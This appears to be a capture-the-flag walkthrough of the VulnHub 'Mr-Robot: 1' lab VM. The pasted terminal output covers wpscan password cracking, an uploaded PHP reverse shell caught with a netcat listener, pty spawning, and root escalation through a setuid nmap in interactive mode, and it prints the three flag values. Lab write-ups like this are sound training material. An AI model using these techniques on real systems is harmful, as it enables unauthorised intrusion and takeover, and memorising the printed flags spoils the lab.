Today I’m publishing my walkthrough against the vm hosted on vulnhub called Mr-Robot: 1 by Jason.
First of all in the webpage’s description we can read that the vm is based on the tv series Mr Robot and there are three hidden keys to find.
So I started to find the vm’s ip by lauching netdiscover command:
Then, I launched nmap:
The scanning result reveals that the open ports are 80 and 443 and the port 22 is closed. Opening the web server I could see a beautiful website and if we write the commands listed on the fake terminal it shows more videos:
I opened source code and I saw some js scripts and one of these looked like it was making you write in window’s log. Nothing interesting:
Then we can see if nikto reveals something:
Good! Nikto said that Apache mod_negotiation is enabled with MultiViews. This means if the server receives a request for a specific folder inexistent, then the server reads the directory looking for files named name_folder.*, and effectively fakes up a type map which names all those files, assigning them the same media types and content-encodings it would have if the client had asked for one of them by name. It then chooses the best match to the client’s requirements. Nikto also said that the website is wordpress so we can launch wpscan for further informations. Before starting wpscan I visited robots.txt in the web server, where I found two interesting files:
File key-1-of-3.txt is the first key found and also another file named fsocity.dic, which supposedly is a wordlist. Thus I launched wpscan:
Perfect! The first scan result reveals a vulnerability and a wordpress installation! I tried to login with some users and obviously I found one user named elliot! So I launched wpscan to crack elliot’s password with the previous wordlist fsocity.dic with slight changes . This was possible because the wordlist contained some repeated passwords.
After less than two minutes I found elliot’s password!! Now we can try to login with these credentials and then we proceed to upload the /usr/share/webshells/php-reverse shell.php file, having already changed the reverse ip address:
I launched the netcat listener and, after triggering the appropriate bash python shell, I listed the home folder and I found the second key file and a md5 password file. Unfortunately the second key was only readable by the root.
root@kali:~/Scrivania/reports/mrrobot# nc -nlvp 1234 listening on [any] 1234 ... connect to [192.168.1.159] from (UNKNOWN) [192.168.1.10] 59837 Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux 02:51:42 up 4:05, 0 users, load average: 0.00, 0.05, 0.37 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=1(daemon) gid=1(daemon) groups=1(daemon) /bin/sh: 0: can't access tty; job control turned off $ $ $ python -c "import pty; pty.spawn('/bin/bash');" daemon@linux:/$ ls -l home ls -l home total 4 drwxr-xr-x 2 root root 4096 Nov 13 2015 robot daemon@linux:/$ cd /home/robot cd /home/robot daemon@linux:/home/robot$ ls -l ls -l total 8 -r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt -rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5 daemon@linux:/home/robot$ cat key-2-of-3.txt cat key-2-of-3.txt cat: key-2-of-3.txt: Permission denied daemon@linux:/home/robot$ cat password.raw-md5 cat password.raw-md5 robot:c3fcd3d76192e4007dfb496cca67e13b daemon@linux:/home/robot$
I opened this website and I tried to find the md5 hash:
After this step, I logged in as robot and I could finally see the second key!!
daemon@linux:/home/robot$ su robot su robot Password: abcdefghijklmnopqrstuvwxyz robot@linux:~$ ls -l ls -l total 8 -r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt -rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5 robot@linux:~$ cat key-2-of-3.txt cat key-2-of-3.txt 822c73956184f694993bede3eb39f959 robot@linux:~$
At this point I wanted to try to seek setuid files that might be exploitable.
robot@linux:~$ find / -perm +6000 2> /dev/null find / -perm +6000 2> /dev/null /bin/ping /bin/umount /bin/mount /bin/ping6 /bin/su /usr/bin/mail-touchlock /usr/bin/passwd /usr/bin/newgrp /usr/bin/screen /usr/bin/mail-unlock /usr/bin/mail-lock /usr/bin/chsh /usr/bin/crontab /usr/bin/chfn /usr/bin/chage /usr/bin/gpasswd /usr/bin/expiry /usr/bin/dotlockfile /usr/bin/sudo /usr/bin/ssh-agent /usr/bin/wall /usr/local/bin/nmap /usr/local/share/xml /usr/local/share/xml/schema /usr/local/share/xml/declaration /usr/local/share/xml/misc /usr/local/share/xml/entities /usr/local/share/ca-certificates
An old nmap version is installed.. We can now use the interactive mode inside nmap and then we can view who we are.. Yes, we are root!!
daemon@linux:/$ /usr/local/bin/nmap --interactive /usr/local/bin/nmap --interactive Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ ) Welcome to Interactive Mode -- press h <enter> for help nmap> !whoami !whoami root waiting to reap child : No child processes nmap> !ls -l /root !ls -l /root total 4 -rw-r--r-- 1 root root 0 Nov 13 2015 firstboot_done -r-------- 1 root root 33 Nov 13 2015 key-3-of-3.txt waiting to reap child : No child processes nmap> !cat /root/key-3-of-3.txt !cat /root/key-3-of-3.txt 04787ddef27c3dee1ee161b21670b4e4 waiting to reap child : No child processes
I browsed into the root folder and I found the third key!!